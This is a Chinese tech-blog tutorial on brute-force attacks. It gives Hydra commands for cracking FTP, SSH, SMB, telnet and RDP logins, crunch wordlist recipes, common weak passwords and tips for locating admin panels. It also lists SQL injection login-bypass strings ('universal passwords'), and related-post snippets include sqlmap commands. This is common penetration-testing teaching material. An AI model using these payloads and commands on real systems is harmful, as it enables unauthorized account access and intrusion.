暴力破解

最新推荐文章于 2024-04-23 23:11:05 发布
最新推荐文章于 2024-04-23 23:11:05 发布
阅读量3k 收藏 9
点赞数 3
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niqiu320/article/details/114839501
版权

暴力破解简介

暴力破解或称为穷举法,是一种针对账号、密码的破译方法,即将账户、密码进行逐个推算直到找出真正的密码为止。
暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。
暴力破解的危害
恶意用户登录
服务器沦陷
敏感信息泄露
用户密码被重置
敏感目录、参数被枚举
用户订单被枚举

暴力破解的分类
从不同的架构来讲主要分为两种
- 基于B/S架构的暴力破解
登录框(用户名和密码)
URL参数(用户id值、目录名、参数名等)
验证码(验证码接收处)
- 基于C/S架构的暴力破解:
Windows远程桌面
ssh远程桌面
数据库账号密码(mysql mssql Oracle等)
ftp账号密码

B/S架构暴力破解流程

在这里插入图片描述
弱口令
弱口令没有严格的定义和标准,实际上来讲,只要是容易被被人猜测或被工具暴力破解到的口令,均为弱口令。

弱口令指的是仅包含简单数字和字母的口令,例如123、“abc”等。不推荐用户使用。
TOP10:
01:123456
02:12345
03: 123456789
04: Password
05: iloveyou
06: Princess
07: rockyou
08: 1234567
09: 12345678
10: abc123
如果想要进行爆破,我们需要先找到站点的后台地址:
在这里插入图片描述
在网站根目录下
例如:admin.php, manage.php等文件,后台管理地址直接存放在根目录

在非根目录下
最常见,例如:/admin,/manage,还有织梦系统地默认后台地址/dede

旁站
将网站和后台分离开,使用不同的端口,比如:www.cao.com:1433/admin

使用二级域名
普通小网站不讲究,对于大型网站来说,分离主要为了方便管理,例如后台:admin.cao.com

其他服务器
无处可寻的后台,完全与网站分离开,ip 地址不同,域名也不同
找后台的方法
在这里插入图片描述
万能密码
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
ASP:
"or “a”="a
')or(‘a’=‘a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or’a’=‘a
“or”="a’=‘a
‘or’’=’
‘or’=‘or’
1 or ‘1’=‘1’=1
1 or ‘1’=‘1’ or 1=1
'OR 1=1%00
"or 1=1%00
‘xor
PHP
‘or 1=1/*
admin’/*
密码*/’
admin’or 1=1#
JSP
1‘or ‘1’='1

C/S架构暴力破解

爆破神器:Hydra,全能暴力破解工具,功能强大,几乎支持所有协议,由黑客组织thc开发。
hydra常用方法
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的。

破解FTP
hydra ip ftp -l username -P 密码字典 -t 线程(默认为16)-vV
破解SSH
hydra -l username -P 密码字典 -e ns ip ssh
破解smb
hydra -l administrator -P 密码字典 ip smb
破解telnet
hydra ip telnet -l username -P 密码字典 -t 32 -s 23 -e ns -f -V
破解rdp
hydra ip rdp -l administrator -P 密码字典 -V
C/S架构暴力破解流程:
1、确定攻击目标,需要账号密码输入的地方(常见的远程桌面。ssh.mysql/mssql等)
2、建立socket通信(多线程)
3、输入账号(一般为默认账号)
4、通过字典或规则生成待检测的密码
5、发送密码,取得验证反馈
6、拒绝密码,重复第四步起,如果密码通过,程序停止,显示密码。
字典生成
windoes 下的字典生成工具,易优,品轩等等
Linux下的字典生成工具
crunch cewl cupp
crunch的使用
Crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。使用Crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。由其在渗透测试需要爆破的时候,字典的编排等直接影响到我们的爆破速度,对整个渗透测试流程起着十分重要的作用。
在这里插入图片描述
Crunch常用语句
指定1-3位数的数字组合
crunch1-3位数的数字组合

crunch 1 3 123 // 1代表最小的字符串长度 3代表最大的字符串长度 123为使用自己指定的字符

如果需要包含空格就需要使用双引号对我们的指定字符串
crunch 1 3 “123” // 其中双引号后123后面是有空格的

生成几个元素的组合,适用于社工时候收集的信息
crunch 4 4 -p xifa 2019 0x00 … //最小和最大字符串随机设定,-p 后面设定要组合的元素,用空格分开

生成指定的字符串
生成六位密码,其中前四位为pass,后二位为特殊字符
crunch 6 6 -t pass^^>>newpwd.txt

制作6位数字字典
crunch 6 6 123456789 -o num6.dic

制作139开头的手机密码字典
crunch 11 11 +0123456789 -t 139%%%%%%%% -b 20mib -o START

生成pass01-pass99所有数字组合
crunch 6 6 -t pass%% >>newpwd.txt

生成六位小写字母密码,其中前四位为pass
crunch 6 6 -t pass@@ >>newpwd.txt

生成六位密码,其中前四位为pass,后二位为大写
crunch 6 6 -t pass, >>newpwd.txt

生成六位密码,其中前四位为pass,后二位为特殊字符
crunch 6 6 -t pass^^ >>newpwd.txt

香芋320
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
凯撒暴力破解
04-18
凯撒密码暴力破解过程,加密,解密过程,通过C语言编写
暴力破解攻击
qq_41453632的博客
11-23 5954
常见攻击流程: 暴力破解攻击定义: 暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名和密码。 暴力破解攻击常见分类: B/S架构暴力破解包含如下分类:1.登录框(用户名和密码)2.URL参数(用户id值.目录名.参数名等)3.验证码(验证码接收处)4.... C...
暴力破解介绍
swordheart的博客
01-24 4100
暴力破解介绍 1、原理说明 暴力破解即账号枚举,攻击者使用自己的用户名和密码字典,对目的服务器进行一个一个尝试登陆,主要字典足够强大,肯定就会猜解成功。尝试爆破成功后,为攻击者下一步渗透做准备。 2、危害说明 目的主机账号猜解成功后,攻击通常利用该账号做如下操作: 1、攻击者通过泄露账户非法登录主机,盗取用户数据; 2、攻击者通过泄露账户非法登录主机,注入病毒程序,执行挖矿或勒索,如gobleImposter勒索病毒、飞客蠕虫; 3、攻击者通过泄露账户非法登录主机,作为跳板机攻
常见网络攻击类型的原理和危害性分析以及对应的解决措施
weixin_43253823的博客
03-10 4712
1.Webshell攻击 威胁级别:高 原理:Webshell攻击就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的,由于Webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。攻击者一般会利用中国菜刀工具上传Webshell到服务器。 危
Python武器库开发-武器库篇之FTP服务暴力破解(五十三)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-01 1339
FTP (File Transfer Protocol) 是一种用于在网络上传输文件的协议。它允许用户通过一个客户端应用程序连接到远程服务器,并通过该服务器传输文件。FTP 服务是在互联网上广泛使用的一种服务,它使用户能够在不同计算机之间快速、安全地共享文件。FTP 服务有两个主要角色:客户端和服务器。客户端是用户使用的应用程序,用于连接到远程服务器并进行文件传输。用户可以使用客户端应用程序进行上传和下载文件,管理文件和目录,以及执行其他与文件操作相关的任务。服务器是提供 FTP 服务的计算机。
暴力破解与验证码安全——BS架构暴力猜解
温柔小薛的博客
04-14 1110
BS架构暴力猜解 浏览器与客户端之间的破解,一般有一个web页面,针对web站点暴破 一般是对 web 应用程序中的高权限用户进行猜解,如网站的内容管理系统账户。一般针对 B/S 的暴力猜解,我们使用 Burp Suit 镜像表单爆破。 操作流程 一般情况 填写账号密码文本框,抓包,发到测试器 选择攻击类型 清除变量 在有效荷载选项(简单列表)选择字典模式,进行上传 开始攻击,找到返回值与其他的数...
orcal暴力破解
08-01
orcal暴力破解工具。OraBrute v 1.1 --------------- orabrute <hostip> <port> <sid> e.g. orabrute 10.1.1.166 1522 orcl 100 100 millisecond wait seems to be optimal for oracle client server in close ...
暴力破解WIFi安卓
09-30
原作者7631329 来自吾爱破解的搬运
暴力破解字典(千万级别)
12-02
超实用暴力破解字典,千万级,好用,话不多说,自己下。。。 方便做渗透实验。。。。。。。。。。。。。。。
暴力破解字典表dic.zip
07-04
最全的密码文档,几百万个,八位数以上的,八位数以下没有
暴力破解_burp
94小菜
01-04 1461
目录简介漏洞挖掘绕过修复建议案例1、基于无效验证码的暴力破解JSON格式的登录基于token的暴力破解认证登录 简介     描述: 将密码进行逐个推算,直到找出真正的密码为止     分类: BS架构(浏览器)、CS架构(客户端)     工具: burp、Hydra、Bruter等 漏洞挖掘 准备工作: 需要强大的字典(包括默认的账号密码) 网站登录密码的复杂度(注册页面可看) 验证
sql1433端口msf、hydra弱口令爆破,获得了sql-server的权限,通过几种方式能够提权
weixin_64655821的博客
08-31 3089
如果得到了1433端口,进行弱口令爆破 ,百度下1433端口,弱口令爆破的方式,kali 中msf hydra弱口令爆破 。总结获得弱口令,获得了sql-server的权限,通过几种方式能够提权。
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2060
id和万能密码
暴力破解是什么意思?底层原理是什么?
长风破浪会有时的博客
05-11 992
暴力破解的底层原理是基于密码的组合数量和密码长度来尝试所有可能的密码组合。密码组合的数量取决于密码字符集的大小和密码长度,如果密码字符集很大且密码长度较长,则暴力破解需要更多的计算和时间才能找到正确的密码。另外,系统管理员可以限制密码尝试次数,设置密码复杂度要求,禁止使用弱密码等方式来防范暴力破解暴力破解是一种密码破解技术,它通过尝试所有可能的密码组合来猜测用户的密码。暴力破解通常用于攻击复杂密码,它需要大量计算和时间,但可以尝试所有可能的密码组合,从而最终破解密码。
暴力破解攻击——基于B/S架构常见检测方式
qq_41453632的博客
11-23 1141
远程通讯法: 第一,确定攻击目标,凡是需要账号密码的地方都可以是攻击目标(常见的web形式); 第二,建立socket通信,为提高效率,通常是多线程; 第三,输入正确的账号(根据实际可对账号进行暴力枚举); 第四,通过字典档或规则生成的待测试的密码; 第五,发送密码,取得验证反馈; 第六,拒绝密码,重复第四步起,如果密码通过,程序停止,显示密码。 本地破解法: 第一,将密码档中的账...
暴力破解笔记
m0_47599604的博客
03-15 401
目录 暴力破解 简介 危害 分类 B/S架构暴力破解 流程 弱口令 万能密码 后台查找方法 找寻后台地址 暴力破解目标 C/S架构暴力破解流程 hydra用法 hydra常用方法 字典生成 暴力破解 简介 暴力破解也叫穷举法,其基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也叫枚举法。针对账号,
浅谈暴力破解
Wawyw's Blog
07-19 4584
0x01 原理 ​ 暴力破解(brute force),又名暴力攻击、暴力猜解,从数学和逻辑学的角度,它属于穷举法在现实场景的运用。当密码未知或获得密码哈希时,攻击者会使用暴力破解来试图登录帐户,即通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式。在ATT&CK中暴力破解有如下四种子技术。 Password Guessing(密码猜测) 事先不了解系统和环境,攻击者会猜测密码以尝试登录帐户。在不了解帐户密码的情况下,攻击者可能会在操作过程中通过使用常用密码字典来猜测登录密码,而无须事先了
一、暴力破解
zrx9988的博客
04-17 623
Burte Force(暴力破解)又名暴力攻击、暴力猜解,从数学和逻辑学的角度,它属于枚举法在现实场景的运用,是利用计算机运算速度快、精确度高的特点,对要解决问题的所有可能情况,一个不漏的进行检验,从中找出符合要求的答案,因此枚举法是通过牺牲时间来换取答案的全面性。
安全小课堂丨什么是暴力破解?如何防止暴力破解
最新发布
a38417的博客
04-23 1558
比如一个6位并且全部由数字组成的密码,可能有100万种组合,也就是说最多需要尝试100万次才能找到正确的密码,但也有可能尝试几次后就能找出正确的密码。从理论上来说,只要字典足够庞大,枚举总是能够成功的,也就是说任何密码都能被破解,只是时间的问题。这些方法被称为字典式攻击。一些黑客会整个运行未经删减的词典,并在单词中增加特殊字符和数字,或者使用特殊的单词词典,但这种类型的顺序攻击非常繁琐。这样一来,您就可以针对自己访问的所有网站创建极长且复杂的密码,并且安全地存储,而您只需要记住密码管理器的一个密码就够了。
sqlmap暴力破解
08-26
引用中提到,与暴力破解表名类似,暴力跑的列名可以在txt/common-columns.txt中找到。这个文件包含了一些常见的列名。而引用和引用提到了sqlmap的两个命令,分别是使用--current-db来获取当前数据库的名称,使用--dbs来获取所有的数据库名称。综合这些信息,可以使用sqlmap来进行暴力破解。 使用sqlmap的暴力破解功能,可以帮助我们获取目标数据库的信息。首先,我们需要使用sqlmap的-u参数指定目标链接,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1"。然后,使用--current-db命令获取当前数据库的名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --current-db。最后,使用--dbs命令获取所有的数据库名称,例如:sqlmap.py -u "http://localhost/sqlilabs/Less-1/?id=1" --dbs。 通过以上步骤,我们可以使用sqlmap来进行暴力破解,获取目标数据库的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqlmap用户手册(七)——爆破等](https://blog.csdn.net/zhaolina004/article/details/14616263)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [实训实训实训](https://blog.csdn.net/IWANnaaa/article/details/123937562)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值